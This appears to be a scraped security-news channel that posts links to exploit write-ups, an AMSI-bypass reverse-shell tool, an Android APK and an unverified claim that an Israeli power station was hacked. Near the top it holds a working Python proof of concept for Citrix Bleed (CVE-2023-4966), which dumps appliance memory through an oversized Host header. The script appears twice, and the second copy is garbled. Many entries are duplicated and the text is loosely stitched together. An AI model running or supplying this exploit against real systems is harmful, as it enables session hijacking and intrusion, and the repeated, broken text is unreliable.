Building an Exploit for FortiGate Vulnerability CVE-2023-27997.
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997
Bishop Fox
Building an Exploit for FortiGate Vulnerability CVE-2023-27997
Learn how Bishop Fox built a POC exploit for the pre-authentication remote code injection vulnerability in the Fortinet SSL VPN published by Lexfo.
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200 )')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200 )')
sys.exit(0)
hostname = args.target
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g.
args = parser.parse_args()
if
print('Target must be provided (e.g. --target
sys.exit(0)
hostname =
if name == "main":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
Zero-Day: CVE-2023-45866 and CVE-2024-21306 exploitation.
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://youtu.be/dj1lGqL8lXo
Mobile Hacker
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing Mobile Hacker
[update 2024-02-19] This vulnerability can be even used to remotely wipe data of targeted Android smartphone. Using this vulnerability it is possible to guess user lock screen PIN. After five incorrect PINs device is locked out for 30 seconds. This operation…
Bypassing Wi-Fi Encryption by Manipulating Transmit Queues.
https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
https://www.usenix.org/system/files/usenixsecurity23-schepers.pdf
China has said in a technological breakthrough; entire electromagnetic spectrum can be analyzed and disabled by the jamming technology.
China Claims Starlink Satellites Now Easy Prey Thanks To ‘Tech Breakthrough’ In Electronic Warfare.
https://www.eurasiantimes.com/china-claims-breakthrough-in-electronic-warfare/amp/
China Claims Starlink Satellites Now Easy Prey Thanks To ‘Tech Breakthrough’ In Electronic Warfare.
https://www.eurasiantimes.com/china-claims-breakthrough-in-electronic-warfare/amp/
EURASIAN TIMES
China Claims Starlink Satellites Now Easy Prey Thanks To 'Tech Breakthrough' In Electronic Warfare
In yet another instance of extraordinary claims emerging from Beijing regarding electronic warfare capabilities, Chinese researchers, for the first time, purportedly have developed seamless, wide-bandwidth, real-time monitoring and analysis of the electromagnetic…
Zero-Day (via CVE-2023-45866): Exploiting Zero-click Android Bluetooth vulnerability to inject keystrokes without pairing.
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
https://www.mobile-hacker.com/2024/01/23/exploiting-0-click-android-bluetooth-vulnerability-to-inject-keystrokes-without-pairing/
Mobile Hacker
Exploiting 0-click Android Bluetooth vulnerability to inject keystrokes without pairing Mobile Hacker
[update 2024-02-19] This vulnerability can be even used to remotely wipe data of targeted Android smartphone. Using this vulnerability it is possible to guess user lock screen PIN. After five incorrect PINs device is locked out for 30 seconds. This operation…
Reverse engineering FOSCAM encryption keys from extracted firmware using Ghidra.
https://hacked.codes/2023/extracting-firmware-reverse-engineering-encryption-keys-foscam/
https://hacked.codes/2023/extracting-firmware-reverse-engineering-encryption-keys-foscam/
hacked.codes
Reverse engineering FOSCAM encryption keys from extracted firmware using Ghidra | hacked.codes
FOSCAM firmware is encrypted with openssl using a salted key. This post will demonstrate how to extract the firmware using an $14 SPI flash programmer, and reverse engineer the decryption keys for the firmware, and RSA keys that ship with the firmware using…
A tool that allegedly bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language Mode) and gives you a FullLanguage PowerShell reverse shell.
https://github.com/Sh3lldon/FullBypass
https://github.com/Sh3lldon/FullBypass
GitHub
GitHub - Sh3lldon/FullBypass: A tool which bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language…
A tool which bypasses AMSI (AntiMalware Scan Interface) and PowerShell CLM (Constrained Language Mode) and gives you a FullLanguage PowerShell reverse shell. - Sh3lldon/FullBypass
BurpSuite's chromium browser adds a header as it sends the request across to the server.
Sec-Ua*
● I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.
● I found it when one website blocked my requests for a normal login (with a 302 redirect to WAF's soft error). This is over a half year old story. Thought of sharing.
HTTP Downgrade attacks with SmuggleFuzz.
https://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html
https://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html
MOOPINGER
HTTP Downgrade attacks with SmuggleFuzz
Place to store my thoughts on all things information-security related. Hopefully you find something of interest. Ramblings are my own. Charlton Smith
com_google_android_apps_bard_1_0_607712083_62_minAPI31nodpi_.apk
2.5 MB
Google's Gemini AI application file (not available globally).
Official source: https://play.google.com/store/apps/details?id=com.google.android.apps.bard
Official source: https://play.google.com/store/apps/details?id=com.google.android.apps.bard
Interesting thread on Azure vulnerability to take over Bing search results.
https://twitter.com/hillai/status/1641146508639600646
https://twitter.com/hillai/status/1641146508639600646
Major cyber-attack on Israel 🇮🇱 by pro-Pslestine hacker groups amid ongoing extermination cum genocide of Muslims ☪️ and Christians ✝️ in Gaza and West-Bank Palestine 🇵🇸 by Israel.
The Eilat power station is pwned and apparently electricity in some areas has been affected by this ICS-SCADA hack.
The Eilat power station is pwned and apparently electricity in some areas has been affected by this ICS-SCADA hack.